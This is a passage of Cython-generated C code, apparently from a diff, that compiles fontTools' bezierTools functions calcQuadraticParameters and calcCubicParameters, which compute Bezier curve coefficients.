__pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":945 - * by = (y2 - cy) * 2.0 - * ax = x3 - cx - bx - * ay = y3 - cy - by # <<<<<<<<<<<<<< - * return (ax, ay), (bx, by), (cx, cy) - * - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_y3, __pyx_v_cy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 945, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_t_1, __pyx_v_by); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 945, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_ay = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":946 - * ax = x3 - cx - bx - * ay = y3 - cy - by - * return (ax, ay), (bx, by), (cx, cy) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 946, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_ax); - __Pyx_GIVEREF(__pyx_v_ax); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_ax)) __PYX_ERR(0, 946, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_ay); - __Pyx_GIVEREF(__pyx_v_ay); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_ay)) __PYX_ERR(0, 946, __pyx_L1_error); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 946, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_bx); - __Pyx_GIVEREF(__pyx_v_bx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_bx)) __PYX_ERR(0, 946, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_by); - __Pyx_GIVEREF(__pyx_v_by); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_by)) __PYX_ERR(0, 946, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 946, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_cx); - __Pyx_GIVEREF(__pyx_v_cx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_cx)) __PYX_ERR(0, 946, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_cy); - __Pyx_GIVEREF(__pyx_v_cy); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_cy)) __PYX_ERR(0, 946, __pyx_L1_error); - __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 946, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_2)) __PYX_ERR(0, 946, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_1)) __PYX_ERR(0, 946, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_t_3)) __PYX_ERR(0, 946, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_1 = 0; - __pyx_t_3 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":938 - * - * - * def calcQuadraticParameters(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticParameters", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_x2); - __Pyx_XDECREF(__pyx_v_y2); - __Pyx_XDECREF(__pyx_v_x3); - __Pyx_XDECREF(__pyx_v_y3); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":949 - * - * - * def calcCubicParameters(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_53calcCubicParameters(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_52calcCubicParameters, "calcCubicParameters(pt1, pt2, pt3, pt4)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_53calcCubicParameters = {"calcCubicParameters", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_53calcCubicParameters, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_52calcCubicParameters}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_53calcCubicParameters(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcCubicParameters (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 949, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 949, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicParameters", 1, 4, 4, 1); __PYX_ERR(0, 949, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 949, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicParameters", 1, 4, 4, 2); __PYX_ERR(0, 949, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 949, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicParameters", 1, 4, 4, 3); __PYX_ERR(0, 949, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcCubicParameters") < 0)) __PYX_ERR(0, 949, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcCubicParameters", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 949, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicParameters", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_52calcCubicParameters(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_52calcCubicParameters(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4) { - PyObject *__pyx_v_x2 = NULL; - PyObject *__pyx_v_y2 = NULL; - PyObject *__pyx_v_x3 = NULL; - PyObject *__pyx_v_y3 = NULL; - PyObject *__pyx_v_x4 = NULL; - PyObject *__pyx_v_y4 = NULL; - PyObject *__pyx_v_dx = NULL; - PyObject *__pyx_v_dy = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicParameters", 1); - - /* "fontTools/misc/bezierTools.py":950 - * - * def calcCubicParameters(pt1, pt2, pt3, pt4): - * x2, y2 = pt2 # <<<<<<<<<<<<<< - * x3, y3 = pt3 - * x4, y4 = pt4 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt2))) || (PyList_CheckExact(__pyx_v_pt2))) { - PyObject* sequence = __pyx_v_pt2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 950, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 950, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 950, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 950, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 950, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 950, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_x2 = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_y2 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":951 - * def calcCubicParameters(pt1, pt2, pt3, pt4): - * x2, y2 = pt2 - * x3, y3 = pt3 # <<<<<<<<<<<<<< - * x4, y4 = pt4 - * dx, dy = pt1 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt3))) || (PyList_CheckExact(__pyx_v_pt3))) { - PyObject* sequence = __pyx_v_pt3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 951, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 951, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 951, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 951, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 951, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 951, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_x3 = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_y3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":952 - * x2, y2 = pt2 - * x3, y3 = pt3 - * x4, y4 = pt4 # <<<<<<<<<<<<<< - * dx, dy = pt1 - * cx = (x2 - dx) * 3.0 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt4))) || (PyList_CheckExact(__pyx_v_pt4))) { - PyObject* sequence = __pyx_v_pt4; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 952, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 952, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 952, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 952, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 952, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 952, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_x4 = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_y4 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":953 - * x3, y3 = pt3 - * x4, y4 = pt4 - * dx, dy = pt1 # <<<<<<<<<<<<<< - * cx = (x2 - dx) * 3.0 - * cy = (y2 - dy) * 3.0 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt1))) || (PyList_CheckExact(__pyx_v_pt1))) { - PyObject* sequence = __pyx_v_pt1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 953, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 953, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 953, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 953, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 953, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 953, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_dx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_dy = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":954 - * x4, y4 = pt4 - * dx, dy = pt1 - * cx = (x2 - dx) * 3.0 # <<<<<<<<<<<<<< - * cy = (y2 - dy) * 3.0 - * bx = (x3 - x2) * 3.0 - cx - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x2, __pyx_v_dx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 954, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_float_3_0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 954, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_cx = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":955 - * dx, dy = pt1 - * cx = (x2 - dx) * 3.0 - * cy = (y2 - dy) * 3.0 # <<<<<<<<<<<<<< - * bx = (x3 - x2) * 3.0 - cx - * by = (y3 - y2) * 3.0 - cy - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_y2, __pyx_v_dy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 955, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_float_3_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 955, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_cy = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":956 - * cx = (x2 - dx) * 3.0 - * cy = (y2 - dy) * 3.0 - * bx = (x3 - x2) * 3.0 - cx # <<<<<<<<<<<<<< - * by = (y3 - y2) * 3.0 - cy - * ax = x4 - dx - cx - bx - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x3, __pyx_v_x2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 956, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_float_3_0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 956, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_cx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 956, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_bx = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":957 - * cy = (y2 - dy) * 3.0 - * bx = (x3 - x2) * 3.0 - cx - * by = (y3 - y2) * 3.0 - cy # <<<<<<<<<<<<<< - * ax = x4 - dx - cx - bx - * ay = y4 - dy - cy - by - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_y3, __pyx_v_y2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 957, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_float_3_0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 957, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_cy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 957, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_by = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":958 - * bx = (x3 - x2) * 3.0 - cx - * by = (y3 - y2) * 3.0 - cy - * ax = x4 - dx - cx - bx # <<<<<<<<<<<<<< - * ay = y4 - dy - cy - by - * return (ax, ay), (bx, by), (cx, cy), (dx, dy) - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x4, __pyx_v_dx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 958, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_t_1, __pyx_v_cx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 958, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_bx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 958, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_ax = 